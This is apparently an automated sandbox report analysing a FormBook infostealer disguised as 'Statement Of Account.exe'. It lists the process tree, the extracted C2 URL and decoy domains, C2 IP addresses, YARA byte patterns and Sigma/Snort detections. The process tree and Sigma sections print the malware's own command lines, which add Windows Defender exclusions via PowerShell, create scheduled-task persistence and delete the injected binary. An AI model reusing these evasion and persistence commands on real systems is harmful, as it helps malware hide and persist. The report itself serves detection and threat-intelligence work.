Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Statement Of Account.exe

Overview

General Information

Sample name:Statement Of Account.exe
Analysis ID:1430501
MD5:da68e8ff4e0c0d00c613fa9301cf4a37
SHA1:7456cf2540dce6403407b532c502ce5abb07e9ec
SHA256:b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Statement Of Account.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\Statement Of Account.exe" MD5: DA68E8FF4E0C0D00C613FA9301CF4A37)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmstp.exe (PID: 7592 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
          • cmd.exe (PID: 7636 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • colorcpl.exe (PID: 7600 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • SdYCcXyq.exe (PID: 7408 cmdline: C:\Users\user\AppData\Roaming\SdYCcXyq.exe MD5: DA68E8FF4E0C0D00C613FA9301CF4A37)
    • schtasks.exe (PID: 7524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 42 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          14.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          14.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          14.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CMSTP Execution Process Creation
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7592, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ProcessId: 7636, ProcessName: cmd.exe
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 7064, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 7064, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, ParentImage: C:\Users\user\AppData\Roaming\SdYCcXyq.exe, ParentProcessId: 7408, ParentProcessName: SdYCcXyq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp", ProcessId: 7524, ProcessName: schtasks.exe
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", ProcessId: 3760, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe", ProcessId: 7064, ProcessName: powershell.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement Of Account.exe", ParentImage: C:\Users\user\Desktop\Statement Of Account.exe, ParentProcessId: 6744, ParentProcessName: Statement Of Account.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp", ProcessId: 3760, ProcessName: schtasks.exe

          Snort Signatures

          Timestamp:04/23/24-18:44:06.302513
          SID:2031412
          Source Port:49750
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/23/24-18:45:09.660568
          SID:2031412
          Source Port:49752
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/23/24-18:43:47.456512
          SID:2031412
          Source Port:49748
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/23/24-18:44:26.966413
          SID:2031412
          Source Port:49751
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeReversingLabs: Detection: 23%
          Multi AV Scanner detection for submitted file
          Source: Statement Of Account.exeReversingLabs: Detection: 23%
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Statement Of Account.exeJoe Sandbox ML: detected
          Source: Statement Of Account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Statement Of Account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
          Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi14_2_00417322
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi14_2_00416CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi14_2_00417D70

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 154.12.38.29:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 34.149.87.45:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 160.124.174.163:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.12.38.29 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lolabeautystudios.com/gs12/
